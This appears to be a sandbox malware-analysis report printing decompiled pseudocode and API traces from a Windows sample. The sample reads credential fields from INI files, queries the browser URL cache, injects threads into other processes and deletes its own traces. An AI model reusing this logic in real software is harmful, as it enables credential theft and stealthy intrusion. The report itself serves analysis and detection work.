    									_t81 = GetPrivateProfileIntW(_v648,  &_v612, 0x15,  &_v528);
    									_v640 = _t81;
    									__eflags = _t81 - 1 - 0xfffe;
    									if(_t81 - 1 <= 0xfffe) {
    										_t112 =  &(_t111[0xff]);
    										_t85 = GetPrivateProfileStringW(_v648,  &_v628, 0, _t112, 0xff,  &_v528);
    										__eflags = _t85;
    										if(_t85 != 0) {
    											_t33 =  &(_t112[0xff]); // 0x0
    											_t124 = _t33;
    											_t88 = GetPrivateProfileStringW(_v648,  &_v620, 0, _t33, 0xff,  &_v528);
    											__eflags = _t88;
    											if(_t88 != 0) {
    												_t89 = E00412510(_t124);
    												__eflags = _t89;
    												if(_t89 > 0) {
    													_t125 =  &_v568;
    													_t90 = 0x55;
    													E00419DD3(_t90,  &_v568);
    													_push(_v640);
    													_t38 =  &(_t112[0xff]); // 0x0
    													_push(_v644);
    													_push(_t112);
    													_t113 = _v636;
    													_t94 = E004126B4(_t125, 0x311, _v636, _t125);
    													_t129 = _t129 + 0x14;
    													__eflags = _t94;
    													if(_t94 > 0) {
    														_t126 = _a4;
    														_t95 = E00411DB5(_t94, _t126, _t113);
    														__eflags = _t95;
    														if(_t95 != 0) {
    															_t42 = _t126 + 4;
    															 *_t42 =  &(( *(_t126 + 4))[0]);
    															__eflags =  *_t42;
    														}
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    							goto L18;
    						}
    						E004119C1(_v644);
    						_t117 = _v636;
    					}
    					goto L20;
    				} else {
    					E0040E3E4(_t132,  &_v524, _a4);
    					goto L21;
    				}
    			}















































    APIs
      • Part of subcall function 00417246: PathCombineW.SHLWAPI(00405D8B,00405D8B,?,00405D8B,?,?), ref: 00417265
    • GetPrivateProfileStringW.KERNEL32 ref: 0040E491
    • StrStrIW.SHLWAPI(?,?), ref: 0040E51E
    • GetPrivateProfileStringW.KERNEL32 ref: 0040E546
    • GetPrivateProfileIntW.KERNEL32 ref: 0040E563
    • GetPrivateProfileStringW.KERNEL32 ref: 0040E594
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: PrivateProfile$String$CombinePath
    • String ID:
    • API String ID: 2134968610-0
    • Opcode ID: 4bf4ce7fce0d279e9b10b00793456ad319a72ea8c2b233add67477e352d3dc95
    • Instruction ID: 5f88bd31cda2e218dc08945d56e75d8ef53380b3487903d03b8cf705e3b5cea8
    • Opcode Fuzzy Hash: 4bf4ce7fce0d279e9b10b00793456ad319a72ea8c2b233add67477e352d3dc95
    • Instruction Fuzzy Hash: 3451B272504302ABD620DB62DC45EEBB7E8AF84704F400D2AF984E3291DB39D95587AA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041BA86(void* __eflags, char* _a4, struct _GOPHER_FIND_DATAA _a8, void _a12, struct _GOPHER_FIND_DATAA _a16) {
    				char _v5;
    				char _v12;
    				signed int _v16;
    				char _v20;
    				char _v24;
    				long _v28;
    				void* __edi;
    				void* __esi;
    				signed int _t55;
    				void* _t58;
    				struct _GOPHER_FIND_DATAA _t59;
    				intOrPtr _t60;
    				struct _GOPHER_FIND_DATAA _t61;
    				struct _GOPHER_FIND_DATAA _t62;
    				signed int _t71;
    				struct _GOPHER_FIND_DATAA _t79;
    				struct _GOPHER_FIND_DATAA _t84;
    				int _t89;
    				struct _GOPHER_FIND_DATAA _t91;
    				void* _t96;
    				intOrPtr* _t99;
    				struct _GOPHER_FIND_DATAA _t103;
    				struct _GOPHER_FIND_DATAA _t107;
    
    				_v16 = _v16 | 0xffffffff;
    				EnterCriticalSection(0x423df4);
    				_t99 = _a4;
    				_t55 = E0041B2EB( *_t99);
    				if(_t55 == 0xffffffff) {
    					L33:
    					LeaveCriticalSection(0x423df4);
    					return _v16;
    				}
    				_t58 = _t55 * 0x24 +  *0x423d8c;
    				if( *((intOrPtr*)(_t58 + 0x10)) <= 0) {
    					goto L33;
    				}
    				_t96 = _t58;
    				if( *((intOrPtr*)(_t96 + 0x10)) != 1 || ( *( *(_t96 + 0xc)) & 0x00000003) == 0) {
    					_t59 = _a16;
    					__eflags = _t59;
    					if(_t59 != 0) {
    						 *_t59 =  *_t59 & 0x00000000;
    						__eflags =  *_t59;
    					}
    					__eflags =  *((intOrPtr*)(_t96 + 0x18)) - 0xffffffff;
    					if(__eflags != 0) {
    						L22:
    						_t60 =  *((intOrPtr*)(_t96 + 0x18));
    						__eflags = _t60 - 0xffffffff;
    						if(_t60 != 0xffffffff) {
    							__eflags = _v16 - 0xffffffff;
    							if(_v16 == 0xffffffff) {
    								_t61 = _t60 -  *(_t96 + 0x1c);
    								__eflags = _t61;
    								_t103 = _t61;
    								if(_t61 != 0) {
    									__eflags = _a8;
    									if(_a8 == 0) {
    										_a12 = E00412D46(0x2000, 0x1000);
    									}
    									__eflags = _a12 - _t103;
    									_t103 =  <  ? _a12 : _t103;
    									__eflags = _a8;
    									if(_a8 != 0) {
    										E004119FD(_a8,  *((intOrPtr*)(_t96 + 0x14)) +  *(_t96 + 0x1c), _t103);
    										_t50 = _t96 + 0x1c;
    										 *_t50 =  *(_t96 + 0x1c) + _t103;
    										__eflags =  *_t50;
    									}
    								}
    								_t62 = _a16;
    								__eflags = _t62;
    								if(_t62 != 0) {
    									 *_t62 = _t103;
    								}
    								_v16 = 1;
    							}
    						}
    						goto L32;
    					}
    					LeaveCriticalSection(0x423df4);
    					_v5 = E0041B96D( &_v20, __eflags,  *_t99,  *((intOrPtr*)(_t96 + 4)),  &_v12);
    					EnterCriticalSection(0x423df4);
    					__eflags = _v5;
    					if(_v5 == 0) {
    						L21:
    						_t37 =  &_v16;
    						 *_t37 = _v16 & 0x00000000;
    						__eflags =  *_t37;
    						SetLastError(0x2ee4);
    						goto L22;
    					}
    					_t105 =  *_a4;
    					_t71 = E0041B2EB( *_a4);
    					__eflags = _t71 - 0xffffffff;
    					if(_t71 == 0xffffffff) {
    						E004119C1(_v12);
    						goto L21;
    					}
    					_t96 = _t71 * 0x24 +  *0x423d8c;
    					_t101 = E00413AF7( &_v24, _t105);
    					_t79 = E00418EB0( *((intOrPtr*)(_t96 + 0x10)),  *(_t96 + 0xc), _t75,  &_v12,  &_v20);
    					__eflags = _t79;
    					if(_t79 == 0) {
    						L19:
    						E004119C1(_t101);
    						 *((intOrPtr*)(_t96 + 0x14)) = _v12;
    						 *((intOrPtr*)(_t96 + 0x18)) = _v20;
    						goto L22;
    					}
    					_t84 = E00411C01(_v24, 0, _t101);
    					_a4 = _t84;
    					__eflags = _t84;
    					if(_t84 == 0) {
    						goto L19;
    					}
    					_v28 = 0x1000;
    					_t107 = E00411991(0x1000);
    					__eflags = _t107;
    					if(_t107 == 0) {
    						L18:
    						E004119C1(_a4);
    						goto L19;
    					}
    					 *_t107 = 0x50;
    					_t89 = GetUrlCacheEntryInfoW(_a4, _t107,  &_v28);
    					__eflags = _t89;
    					if(_t89 != 0) {
    						_t91 =  *(_t107 + 8);
    						__eflags = _t91;
    						if(_t91 != 0) {
    							__eflags =  *_t91;
    							if( *_t91 != 0) {
    								E00416B71(_t91, _v12, _v20);
    							}
    						}
    					}
    					E004119C1(_t107);
    					goto L18;
    				} else {
    					 *_t99 =  *((intOrPtr*)(_t96 + 0x20));
    					L32:
    					goto L33;
    				}
    			}



























    APIs
    • EnterCriticalSection.KERNEL32(00423DF4), ref: 0041BA97
    • LeaveCriticalSection.KERNEL32(00423DF4), ref: 0041BAFA
    • EnterCriticalSection.KERNEL32(00423DF4), ref: 0041BB17
    • GetUrlCacheEntryInfoW.WININET(?,00000000,000000FF), ref: 0041BB9B
    • SetLastError.KERNEL32(00002EE4), ref: 0041BBF1
    • LeaveCriticalSection.KERNEL32(00423DF4), ref: 0041BC5A
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$EnterLeave$CacheEntryErrorInfoLast
    • String ID:
    • API String ID: 3653105453-0
    • Opcode ID: 030cce3c671089d88fdc42ca4b9042e326b394b565128cdbe15e5fa94d8b30f5
    • Instruction ID: 60553a864248170e0e78a408823a5834bb77a6fde5235404a22a949d5a0e1890
    • Opcode Fuzzy Hash: 030cce3c671089d88fdc42ca4b9042e326b394b565128cdbe15e5fa94d8b30f5
    • Instruction Fuzzy Hash: 3D517E71A00205ABCF11DF65C885BDE7BB4EF04354F04455AF920AB2A5D778EA81CBE8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E0040E025(void* __edx, void* __eflags, WCHAR* _a4, intOrPtr _a8) {
    				WCHAR* _v8;
    				WCHAR* _v12;
    				short* _v16;
    				WCHAR* _v20;
    				short _v32;
    				short _v48;
    				short _v68;
    				short _v88;
    				short _v112;
    				char _v144;
    				void* __edi;
    				void* __esi;
    				WCHAR* _t40;
    				long _t41;
    				void* _t48;
    				void* _t50;
    				void* _t52;
    				void* _t54;
    				void* _t56;
    				WCHAR* _t61;
    				WCHAR* _t64;
    				void* _t72;
    				void* _t76;
    				WCHAR* _t83;
    				WCHAR* _t84;
    				WCHAR* _t86;
    				intOrPtr _t96;
    				void* _t97;
    
    				_t81 = __edx;
    				_t40 = E00411991(0x1fffe);
    				_t86 = _t40;
    				_v20 = _t86;
    				if(_t86 == 0) {
    					return _t40;
    				}
    				_t41 = GetPrivateProfileStringW(0, 0, 0, _t86, 0xffff, _a4);
    				if(_t41 <= 0) {
    					L17:
    					return E004119C1(_t86);
    				}
    				_t3 = _t41 + 1; // 0x1
    				if(E00412871(_t86, _t3) == 0) {
    					goto L17;
    				}
    				_t83 = E00411991(0xc08);
    				_v12 = _t83;
    				if(_t83 == 0) {
    					goto L17;
    				} else {
    					_t5 =  &(_t83[0x2fd]); // 0x5fa
    					_v16 = _t5;
    					_v8 = _t86;
    					_t48 = 0x65;
    					E00419DD3(_t48,  &_v112);
    					_t50 = 0x66;
    					E00419DD3(_t50,  &_v48);
    					_t52 = 0x67;
    					E00419DD3(_t52,  &_v32);
    					_t54 = 0x68;
    					E00419DD3(_t54,  &_v88);
    					_t56 = 0x69;
    					E00419DD3(_t56,  &_v68);
    					goto L6;
    					L15:
    					_t61 = E004128AD(_v8, 1);
    					_v8 = _t61;
    					if(_t61 != 0) {
    						_t83 = _v12;
    						L6:
    						if(StrStrIW(_v8,  &_v112) == 0) {
    							_t64 = StrStrIW(_v8,  &_v48);
    							if(_t64 == 0 && GetPrivateProfileStringW(_v8,  &_v32, _t64, _t83, 0xff, _a4) != 0) {
    								_t84 =  &(_t83[0xff]);
    								if(GetPrivateProfileStringW(_v8,  &_v88, 0, _t84, 0xff, _a4) != 0) {
    									_t26 =  &(_t84[0xff]); // 0x0
    									_t94 = _t26;
    									if(GetPrivateProfileStringW(_v8,  &_v68, 0, _t26, 0xff, _a4) != 0 && E0040DEBA(_t81, _t94) > 0) {
    										_t95 =  &_v144;
    										_t72 = 0x56;
    										E00419DD3(_t72,  &_v144);
    										_push(_v12);
    										_t30 =  &(_t84[0xff]); // 0x0
    										_push(_t84);
    										_t85 = _v16;
    										_t81 = 0x307;
    										_t76 = E004126B4(_t95, 0x307, _v16, _t95);
    										_t97 = _t97 + 0x10;
    										if(_t76 > 0) {
    											_t96 = _a8;
    											if(E00411DB5(_t76, _t96, _t85) != 0) {
    												 *((intOrPtr*)(_t96 + 4)) =  *((intOrPtr*)(_t96 + 4)) + 1;
    											}
    										}
    									}
    								}
    							}
    						}
    						goto L15;
    					} else {
    						E004119C1(_v12);
    						_t86 = _v20;
    						goto L17;
    					}
    				}
    			}
































    APIs
    • GetPrivateProfileStringW.KERNEL32 ref: 0040E05C
      • Part of subcall function 00411991: HeapAlloc.KERNEL32(00000008,-00000004,0041315F,00000000,?,?,?,00405C4E,00000000,00406128,?,?,00000000), ref: 004119A2
    • StrStrIW.SHLWAPI(00000001,?), ref: 0040E0E4
    • StrStrIW.SHLWAPI(00000001,?), ref: 0040E0F5
    • GetPrivateProfileStringW.KERNEL32 ref: 0040E111
    • GetPrivateProfileStringW.KERNEL32 ref: 0040E12F
    • GetPrivateProfileStringW.KERNEL32 ref: 0040E149
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: PrivateProfileString$AllocHeap
    • String ID:
    • API String ID: 2479592106-0
    • Opcode ID: c975e9c43a5d63f231f834c8235cd5443bf01857565579506f5ff7366bedef31
    • Instruction ID: 83252979ccd46096de12e032b10e53ef2222247e01eda2db6608e27594018c9a
    • Opcode Fuzzy Hash: c975e9c43a5d63f231f834c8235cd5443bf01857565579506f5ff7366bedef31
    • Instruction Fuzzy Hash: 0341903290021AFADF109BA69C11EEFBB79EF44714F144426FA04F7291DB389E558798
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E0041CF1D(void* __ebx, void* __ecx, void* __eflags) {
    				char _v1168;
    				char _v1668;
    				char _v1680;
    				short _v1688;
    				char _v2192;
    				short _v2208;
    				char _v2720;
    				char _v2728;
    				char _v2992;
    				char _v3072;
    				void* __edi;
    				void* __esi;
    				void* _t34;
    				WCHAR* _t50;
    				WCHAR* _t51;
    				WCHAR* _t52;
    				void* _t65;
    
    				_t65 = __eflags;
    				_t46 = __ecx;
    				_t50 =  &_v1668;
    				E0040666E(__ecx, _t50, 1);
    				PathRemoveFileSpecW(_t50);
    				_t51 =  &_v2192;
    				E0040666E(_t46, _t51, 2);
    				PathRemoveFileSpecW(_t51);
    				 *0x422530 =  *0x422530 | 0x00000002;
    				_push(0);
    				E0041C463();
    				E0040A42C(_t46, _t65);
    				E0041702F( &_v1680, _t65);
    				E0041702F(_t51, _t65);
    				_t52 =  &_v2720;
    				E0040666E(_t51, _t52, 3);
    				SHDeleteKeyW(0x80000001, _t52);
    				CharToOemW( &_v1688,  &_v2728);
    				CharToOemW( &_v2208,  &_v2992);
    				_t53 =  &_v3072;
    				_t34 = 7;
    				E00419D9D(_t34,  &_v3072);
    				_push( &_v2992);
    				_push( &_v2728);
    				_push( &_v2992);
    				_push( &_v2728);
    				if(E004126F8( &_v3072, 0x474,  &_v1168, _t53) > 0) {
    					E00413481(__ebx, 0x474,  &_v1168);
    				}
    				if( *0x4229f8 == 0xffffffff) {
    					ExitProcess(0);
    				}
    				return 1;
    			}





















    APIs
      • Part of subcall function 0040666E: PathRenameExtensionW.SHLWAPI(?,.dat,?,00422590,00000000,00000032,?,77A19EB0,00000000), ref: 004066E7
    • PathRemoveFileSpecW.SHLWAPI(?,00000001), ref: 0041CF42
    • PathRemoveFileSpecW.SHLWAPI(?,00000002), ref: 0041CF55
      • Part of subcall function 0041C463: SetEvent.KERNEL32(0041CF65,00000000), ref: 0041C469
      • Part of subcall function 0041C463: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041C47C
      • Part of subcall function 0040A42C: SHDeleteValueW.SHLWAPI(80000001,?,?,FF220829,?,00000000), ref: 0040A469
      • Part of subcall function 0040A42C: Sleep.KERNEL32(000001F4), ref: 0040A478
      • Part of subcall function 0040A42C: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?), ref: 0040A48E
      • Part of subcall function 0041702F: FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00417060
      • Part of subcall function 0041702F: FindNextFileW.KERNEL32(00000000,?,?,00000000), ref: 004170BB
      • Part of subcall function 0041702F: FindClose.KERNEL32(00000000,?,00000000), ref: 004170C6
      • Part of subcall function 0041702F: SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000000), ref: 004170D2
      • Part of subcall function 0041702F: RemoveDirectoryW.KERNEL32(?,?,00000000), ref: 004170D9
    • SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 0041CF93
    • CharToOemW.USER32 ref: 0041CFAF
    • CharToOemW.USER32 ref: 0041CFBE
    • ExitProcess.KERNEL32 ref: 0041D014
      • Part of subcall function 00413481: CharToOemW.USER32 ref: 004134B1
      • Part of subcall function 00413481: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00413535
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: File$CharFindPathRemove$DeleteSpec$AttributesCloseDirectoryEnvironmentEventExitExtensionFirstNextObjectOpenProcessRenameSingleSleepValueVariableWait
    • String ID:
    • API String ID: 1572960351-0
    • Opcode ID: 05653225df807d5a333cc25fc65d00e2ae1cfe9d35698bda1775804d2b3bcdce
    • Instruction ID: 27761b5bea5523f5187d2c27bbec9f72bf82459ee77a4c30e3cd75b118de2caf
    • Opcode Fuzzy Hash: 05653225df807d5a333cc25fc65d00e2ae1cfe9d35698bda1775804d2b3bcdce
    • Instruction Fuzzy Hash: 1321C472908344ABC230A7A1EC0AFDF7B9CEB84314F00092FF558E3191DB75A545CB96
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E004160F6(int __ecx, intOrPtr* __edx, struct tagPOINT _a4, signed int _a8) {
    				intOrPtr* _v8;
    				long _v12;
    				struct HWND__* _v16;
    				int _v20;
    				struct HWND__* _v24;
    				long _t24;
    				struct HWND__* _t33;
    				intOrPtr* _t44;
    
    				_push(_a8);
    				_t44 = __edx;
    				_v8 = __edx;
    				_v20 = __ecx;
    				_t33 = WindowFromPoint(_a4.x);
    				if(_t33 != 0) {
    					if(SendMessageTimeoutW(_t33, 0x84, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4.x & 0x0000ffff, 2, _v20,  &_v12) != 0) {
    						_t24 = _v12;
    						if(_t24 != 0xffffffff) {
    							if(_t44 != 0) {
    								 *_t44 = _t24;
    							}
    						} else {
    							_v16 = _t33;
    							SetWindowLongW(_t33, 0xfffffff0, GetWindowLongW(_t33, 0xfffffff0) | 0x08000000);
    							_t33 = E004160F6(_v20, _v8, _a4, _a8);
    							SetWindowLongW(_v24, 0xfffffff0, GetWindowLongW(_v24, 0xfffffff0) & 0xf7ffffff);
    						}
    					} else {
    						_t33 = 0;
    					}
    				}
    				return _t33;
    			}












    APIs
    • WindowFromPoint.USER32(?,?,00000000,?,?,?,00000000), ref: 00416112
    • SendMessageTimeoutW.USER32 ref: 00416143
    • GetWindowLongW.USER32(00000000,000000F0), ref: 00416167
    • SetWindowLongW.USER32 ref: 00416178
    • GetWindowLongW.USER32(?,000000F0), ref: 00416195
    • SetWindowLongW.USER32 ref: 004161A3
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Window$Long$FromMessagePointSendTimeout
    • String ID:
    • API String ID: 2645164282-0
    • Opcode ID: 00971d11707421dc6d20fdd3213c47e2d639a5c3f40799647488a0b1dca01f05
    • Instruction ID: 520980316efc3a1cf9a784804cb89f8823a69b0462c98f8f14fae0b48f2a3f0e
    • Opcode Fuzzy Hash: 00971d11707421dc6d20fdd3213c47e2d639a5c3f40799647488a0b1dca01f05
    • Instruction Fuzzy Hash: C121D571508315BBEB109F24CC40EAB7BA8EB84374F20472AFDB4923F2DA74D9448B95
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 74%
    			E00416BD6(signed int __eax, void* __ecx, void** __esi, long _a4) {
    				intOrPtr _v8;
    				long _v12;
    				void* _t19;
    				void* _t20;
    				long _t22;
    				void* _t23;
    
    				_t33 = __esi;
    				asm("sbb eax, eax");
    				_t19 = CreateFileW(_a4, 0x80000000,  ~(__eax & 2) & 0x00000006 | 0x00000001, 0, 3, 0, 0);
    				__esi[2] = _t19;
    				if(_t19 == 0xffffffff) {
    					L11:
    					_t20 = 0;
    				} else {
    					__imp__GetFileSizeEx(_t19,  &_v12);
    					if(_t19 == 0 || _v8 != 0) {
    						L10:
    						CloseHandle(_t33[2]);
    						goto L11;
    					} else {
    						_t22 = _v12;
    						__esi[1] = _t22;
    						if(_t22 != 0) {
    							_t23 = VirtualAlloc(0, _t22, 0x3000, 4);
    							 *__esi = _t23;
    							if(_t23 == 0) {
    								goto L10;
    							} else {
    								if(ReadFile(__esi[2], _t23, __esi[1],  &_a4, 0) == 0 || _a4 != __esi[1]) {
    									VirtualFree( *_t33, 0, 0x8000);
    									goto L10;
    								} else {
    									goto L5;
    								}
    							}
    						} else {
    							 *__esi = 0;
    							L5:
    							_t20 = 1;
    						}
    					}
    				}
    				return _t20;
    			}










    APIs
    • CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,00406B68,?,?,00000000), ref: 00416BFB
    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00406B68,?,?,00000000), ref: 00416C0E
    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,00406B68,?,?,00000000), ref: 00416C36
    • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00406B68,?,?,00000000), ref: 00416C4E
    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00406B68,?,?,00000000), ref: 00416C68
    • CloseHandle.KERNEL32(?,?,?,?,?,00406B68,?,?,00000000), ref: 00416C71
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
    • String ID:
    • API String ID: 1974014688-0
    • Opcode ID: 333e3b655cb08df1a997c1f841037d108384134b0dea949c7aa4095abb27387c
    • Instruction ID: 3e7ca0db43b45abdae20cf9b52ae5bf4cb520d0f90c453c73caacc185174bf89
    • Opcode Fuzzy Hash: 333e3b655cb08df1a997c1f841037d108384134b0dea949c7aa4095abb27387c
    • Instruction Fuzzy Hash: 9111B675100600BFDB218F21CD49EAB7BB8EB45700B10492EF5D2E52B0E331E890CB68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E0040C24F(struct HWND__* _a4, struct HRGN__* _a8, int _a12) {
    				void* _t21;
    				int _t22;
    				signed int _t23;
    				struct HWND__* _t27;
    				char* _t31;
    
    				_t27 = _a4;
    				if(( *0x422530 & 0x00000004) == 0 || E00406473() == 0) {
    					L7:
    					return GetUpdateRgn(_t27, _a8, _a12);
    				} else {
    					_t31 = TlsGetValue( *0x423e7c);
    					if(_t31 == 0 || _t27 !=  *((intOrPtr*)(_t31 + 4))) {
    						goto L7;
    					} else {
    						SetRectRgn(_a8,  *(_t31 + 0xc),  *(_t31 + 0x10),  *(_t31 + 0x14),  *(_t31 + 0x18));
    						if(_a12 != 0) {
    							_t22 = SaveDC( *(_t31 + 8));
    							_t23 = SendMessageW(_t27, 0x14,  *(_t31 + 8), 0);
    							asm("sbb eax, eax");
    							 *((intOrPtr*)(_t31 + 0x1c)) =  ~_t23 + 1;
    							RestoreDC( *(_t31 + 8), _t22);
    						}
    						 *_t31 = 1;
    						_t21 = 2;
    						return _t21;
    					}
    				}
    			}









    APIs
    • GetUpdateRgn.USER32 ref: 0040C2D7
      • Part of subcall function 00406473: WaitForSingleObject.KERNEL32(00000000,0041D5FF,743C152E,00000002), ref: 0040647B
    • TlsGetValue.KERNEL32 ref: 0040C26F
    • SetRectRgn.GDI32(?,?,?,?,?), ref: 0040C28F
    • SaveDC.GDI32(?), ref: 0040C29F
    • SendMessageW.USER32(?,00000014,?,00000000), ref: 0040C2AF
    • RestoreDC.GDI32(?,00000000), ref: 0040C2C1
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
    • String ID:
    • API String ID: 3142230470-0
    • Opcode ID: bed6a7ac560ef741420af58551c67518777da336020a6dc14124bb83a8520ac2
    • Instruction ID: 1c40d8dae3581bbcce3c9806edcbb74b1e915ebbae805969e79d58ae25f1315a
    • Opcode Fuzzy Hash: bed6a7ac560ef741420af58551c67518777da336020a6dc14124bb83a8520ac2
    • Instruction Fuzzy Hash: 29119E31040740EBDB325FA1ED88F96BBA6FB18710F044A69FA86A19B1C3359450DB58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E00419F95(void* __ecx, long _a4, intOrPtr _a8) {
    				char _v5;
    				void* __edi;
    				void* __esi;
    				void* _t10;
    				void* _t14;
    				void* _t23;
    				void* _t25;
    				void* _t26;
    
    				_t21 = __ecx;
    				_push(__ecx);
    				_v5 = 0;
    				_t23 = OpenProcess(0x47a, 0, _a4);
    				_t28 = _t23;
    				if(_t23 != 0) {
    					_push(_t25);
    					_t10 = E00406388(_t21, _t23, _t25, _t28, _a8, 0);
    					_t26 = _t10;
    					if(_t26 != 0) {
    						_t14 = CreateRemoteThread(_t23, 0, 0, _t10 -  *0x422544 + E00406B38, 0, 0, 0);
    						_a4 = _t14;
    						if(_t14 == 0) {
    							VirtualFreeEx(_t23, _t26, 0, 0x8000);
    						} else {
    							WaitForSingleObject(_t14, 0x2710);
    							CloseHandle(_a4);
    							_v5 = 1;
    						}
    					}
    					CloseHandle(_t23);
    				}
    				return _v5;
    			}












    APIs
    • OpenProcess.KERNEL32(0000047A,00000000,7519F560,00000000,7519F560,?,?,0041A157,?,?,00000000), ref: 00419FA9
    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-0082907C,00000000,00000000,00000000), ref: 00419FD7
    • WaitForSingleObject.KERNEL32(00000000,00002710,?,0041A157,?,?,00000000), ref: 00419FEA
    • CloseHandle.KERNEL32(7519F560,?,0041A157,?,?,00000000), ref: 00419FF3
    • VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,0041A157,?,?,00000000), ref: 0041A007
    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,0041A157,?,?,00000000), ref: 0041A00E
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseHandle$CreateFreeObjectOpenProcessRemoteSingleThreadVirtualWait
    • String ID:
    • API String ID: 14861764-0
    • Opcode ID: 0bc17df3fb1c5614fc7e5b29a29155aa7ff187c1e1a35fce4eefcbf85d486557
    • Instruction ID: 820b828a1115122de494b6f114a98d6cfc6e6ceebc382e77795ce46be95bfb5e
    • Opcode Fuzzy Hash: 0bc17df3fb1c5614fc7e5b29a29155aa7ff187c1e1a35fce4eefcbf85d486557
    • Instruction Fuzzy Hash: BE019EB2104218BFE7112F649DCCDEF3E6CDB49398B04406AF902F6260C6794C968679
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 41%
    			E0040AFD9(char* __ecx, void* __edx, signed int _a4, signed int _a8) {
    				char _v5;
    				signed int _v12;
    				char _v20;
    				char _v64;
    				char _v552;
    				char _v556;
    				short _v588;
    				void* __ebx;
    				void* __esi;
    				signed int _t62;
    				signed int _t64;
    				signed int _t65;
    				signed short _t71;
    				signed short _t75;
    				void* _t92;
    				void* _t95;
    				void* _t97;
    				signed short _t99;
    				void* _t100;
    				void* _t101;
    				void* _t102;
    				void* _t103;
    				void* _t104;
    				void* _t105;
    				void* _t109;
    				signed int _t111;
    				char* _t112;
    				void* _t113;
    
    				_t109 = __edx;
    				_t106 = __ecx;
    				_t111 = _a4;
    				_t114 =  *_t111;
    				_t99 = 1;
    				_v5 = 0;
    				if( *_t111 == 0) {
    					_t97 = E004172A2(_t114);
    					 *_t111 = _t97;
    					if(_t97 == 0) {
    						return 0;
    					}
    					_v5 = 1;
    				}
    				__eflags = _a8 & 0x00000001;
    				if((_a8 & 0x00000001) == 0) {
    					L9:
    					__eflags = _a8 & 0x00000002;
    					if((_a8 & 0x00000002) != 0) {
    						_push( &_v12);
    						_push(0x20000);
    						_push(0x2713);
    						_t105 = 4;
